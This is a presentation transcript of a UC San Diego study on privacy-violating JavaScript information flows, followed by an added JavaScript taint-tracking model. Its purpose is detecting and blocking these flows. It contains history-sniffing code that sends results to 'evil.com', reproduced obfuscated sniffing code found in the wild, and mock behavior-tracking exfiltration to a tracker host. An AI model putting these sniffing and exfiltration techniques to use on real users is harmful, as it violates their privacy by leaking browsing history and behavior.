
An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications

Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham (UC San Diego)


Presentation Transcript


  1. An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham, UC San Diego

  2. • Phishing • Location Hijacking • document.location

  3. • Identity Theft • Cookie Stealing • document.cookie

  4. • History Sniffing (figure: JavaScript tells Visited links from Not-Visited ones)

  5. See absolutely everything visitors do on your webpage. …

  6. • Behavior Tracking

  7. Plenty of Mischief Possible!

  8. • How Prevalent Are Malicious Flows? • How to Detect Malicious Flows?

  9. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  10. Flow Policies • Specify different types of flows

  11. Policies: History Sniffing • 1. Create an (invisible) link to a.com; the browser styles it according to whether a.com is in the history • 2. Inspect the link's computed color style property; the color says whether the link was visited • 3. Send the sniffed bit over the network

  12. Policies: History Sniffing
      link = createLink("facebook.com");
      style = doc.getStyle(link);
      visited = style.color == "purple";
      send("evil.com", "facebook=" + visited);

  13. Policies: History Sniffing • Inject Taints (at confidential sources): the style returned by doc.getStyle(link) is tainted.

  14. Policies: History Sniffing • Propagate Taints (at assignments, etc.): the taint flows from style into style.color == "purple", into visited, and into the string "facebook=" + visited.

  15. Policies: History Sniffing • Block Taints (at untrusted sinks): send("evil.com", "facebook=" + visited) is refused because its second argument carries the taint.

  16. Flow Policies • Inject • Block

  17. Flow Policies • Inject: at doc.getStyle($1) if isLink($1) inject "secret" • Taint style with "secret"

  19. Flow Policies • Block: at send($1, $2) block "secret" on $2 • Block tainted values to third-party

  20. Flow Policies • General form: at Site if Cond inject Taint • at Site block Taint on Param

  21. Flow Policies • Expressive • History Sniffing • Behavior Tracking • Cookie Stealing • Location Hijacking…

  22. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  23. Dynamic Flow Tracking [Chander et al POPL 07] • Pipeline: Source code → Parse → AST → Rewrite → AST → Execute (dynamic eval) • Rewrite JS code to carry taints

  24. Rewritten code: add .taint fields; inject, propagate, and block taints

  25. Rewriting issues: boxing / unboxing; indirect flows

  27. Dynamic Flow Tracking • Implemented in Chrome/V8

  28. Dynamic Flow Tracking • Performance (Overhead)

  29. Performance: Policies • Cookie Confidentiality • cookie doesn't flow to 3rd-party code • Location Integrity • location unaffected by 3rd-party code

  30. Performance: Benchmark • 10 sites with the largest JS code base in Alexa top 100 • 15 – 31 Kloc (avg. 21Kloc)

  31. Performance: Figures • Timing Overheads • Page load (avg: 2x) • JS execution (avg: 3x)

  32. Performance: Upshot • High for online use • Acceptable for offline survey

  33. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  34. Flows “In the Wild” • History Sniffing • Behavior Tracking

  35. History Sniffing: Figures • Alexa Top 50,000 sites • 63 sites reported as sending history over network • 1 site in Alexa Top 100 • 46 sites were real cases

  36. History Sniffing: Example
      var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn", ...};   // obfuscated URLs
      var g = [];
      for (var m in k) {
        var d = k[m];
        var a = "";
        for (f = 0; f < d.length; f++)                         // "decrypt": shift every char code down by one
          a += String.fromCharCode(d.charCodeAt(f) - 1);
        var h = false;
        for (var j in { "http://": "", "http://www.": "" }) {
          var l = document.createElement("a");                 // create link
          l.href = j + a;
          document.getElementById("ol").appendChild(l);
          var e = document.getComputedStyle(l).getPropertyValue("color");   // inspect color
          if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
        }
        if (h) { g.push(m) }
      }
      • Obfuscated URLs: each character code is shifted up by one, so this is obfuscation rather than encryption ("qpsoivc/dpn" decodes to "pornhub.com") • Decode URL • Create Link • Inspect Color (the site's :visited CSS sets rgb(12, 34, 56))

  37-41. History Sniffing: Real Cases (screenshots) • charter.net → doubleclick.net • interclick • gamestorrents • harrenmedianetwork • meaningtool

  42. History Sniffing: Upshot • # of sniffed URLs: 8 to 222 • Of the 46 real cases, 39 had third-party sniffing code and 7 had home-grown code • Obfuscated sniffing code • Code was generated at runtime

  43. Malicious Flows "In the Wild" • History Sniffing • Behavior Tracking

  44. Behavior Tracking • Log user behavior by JS event handlers • Send log back to website

  45. Behavior Tracking: Policy
      while (1) {
        e = getEvent();
        if (e.isMouseOver()) onMouseOver(e);
        if (e.isClick()) onClick(e);
        ...
      }
      onMouseOver = function(event) { isMouseOver = true; }   // the write to isMouseOver is control-dependent on e.isMouseOver()

  46. Behavior Tracking: Policy • at $1.isMouseOver() inject "secret" • at $1.isClick() inject "secret" • …
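The inject / propagate / block policies of slides 16-20, the rewriting issues of slides 23-27 (boxing and unboxing, indirect flows), and the behavior-tracking policy of slides 45-46, worked through as an added JavaScript example. This is not the paper's V8 implementation: the Tainted box, the pc-taint stack for control dependencies, the mock browser (createLink, getStyle, isMouseOver, send) and the hosts facebook.com, evil.com and tracker.example are all constructed for the example.

```javascript
// Added example, not the paper's V8 rewriter: a boxed-taint model of the
// "at Site if Cond inject Taint / at Site block Taint on Param" policies.
// The DOM, history, event predicate and network below are constructed mocks.

class Tainted {
  constructor(value, taints) { this.value = value; this.taints = new Set(taints); }
}
const unbox = v => (v instanceof Tainted ? v.value : v);
const taintsOf = v => (v instanceof Tainted ? v.taints : new Set());

// Taints of the enclosing branch conditions (the "program counter" taint);
// a write performed inside a branch picks these up, which models indirect flows.
const pcStack = [];

// Propagate: a result carries the taints of its operands plus the pc taints.
function propagate(result, ...operands) {
  const t = new Set();
  for (const s of pcStack) for (const x of s) t.add(x);
  for (const op of operands) for (const x of taintsOf(op)) t.add(x);
  return t.size ? new Tainted(result, t) : result;
}
const eq = (a, b) => propagate(unbox(a) === unbox(b), a, b);
const cat = (a, b) => propagate(String(unbox(a)) + String(unbox(b)), a, b);
const prop = (obj, name) => propagate(unbox(obj)[name], obj);
const assign = v => propagate(unbox(v), v);
function branch(cond, thenFn) {            // rewritten `if`: push the condition's taints
  pcStack.push(taintsOf(cond));
  try { if (unbox(cond)) thenFn(); } finally { pcStack.pop(); }
}

// Policy in the slides' two clauses: inject at a source site when Cond holds,
// block a taint on a parameter of a sink site.
const policy = {
  inject: [
    { site: 'getStyle',    cond: n => n.isLink === true, taint: 'secret' },
    { site: 'isMouseOver', cond: () => true,             taint: 'secret' },
  ],
  block: [{ site: 'send', taint: 'secret', param: 1 }],
};
function injected(site, arg, value) {
  const t = policy.inject.filter(r => r.site === site && r.cond(arg)).map(r => r.taint);
  return t.length ? new Tainted(value, t) : value;
}

// Mock browser: visited-link history, computed style, event predicate, network sink.
function makeBrowser(visitedHosts) {
  const history = new Set(visitedHosts);
  const sent = [];
  return {
    sent,
    createLink: host => ({ isLink: true, host }),
    getStyle: node => injected('getStyle', node, { color: history.has(node.host) ? 'purple' : 'blue' }),
    isMouseOver: ev => injected('isMouseOver', ev, ev.type === 'mouseover'),
    send: (dest, payload) => {
      const args = [dest, payload];
      for (const r of policy.block.filter(rule => rule.site === 'send')) {
        if (taintsOf(args[r.param]).has(r.taint)) throw new Error(`blocked: ${r.taint} flows to ${unbox(dest)}`);
      }
      sent.push({ dest, payload: unbox(payload) });
    },
  };
}

// Slide 12: history sniffing as a direct flow.
function sniffDirect(b) {
  const style = b.getStyle(b.createLink('facebook.com'));
  const visited = eq(prop(style, 'color'), 'purple');
  b.send('evil.com', cat('facebook=', visited));
}
// Slide 36: the same leak as an indirect flow (the write to h is control-dependent).
function sniffIndirect(b) {
  const style = b.getStyle(b.createLink('facebook.com'));
  let h = false;
  branch(eq(prop(style, 'color'), 'purple'), () => { h = assign(true); });
  b.send('evil.com', cat('facebook=', h));
}
// Slides 45-46: behavior tracking; the handler's write depends on the tainted predicate.
function trackMouse(b, events) {
  let isMouseOver = false;
  for (const e of events) branch(b.isMouseOver(e), () => { isMouseOver = assign(true); });
  b.send('tracker.example', cat('hover=', isMouseOver));
}
// Runs one scenario under the policy and reports whether the sink was reached.
function run(fn, b, ...rest) {
  try { fn(b, ...rest); return 'allowed'; } catch (e) { return e.message; }
}
```

With facebook.com in the history, both the direct and the indirect sniff are blocked at send. With an empty history the indirect variant goes through: the tainted branch is not taken, h keeps its untainted initial value, and "facebook=false" reaches evil.com. That untaken-path blind spot is the known limitation of purely dynamic tracking of indirect flows, and it is why the rewriting step has to treat indirect flows as a separate issue rather than as plain assignment propagation.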
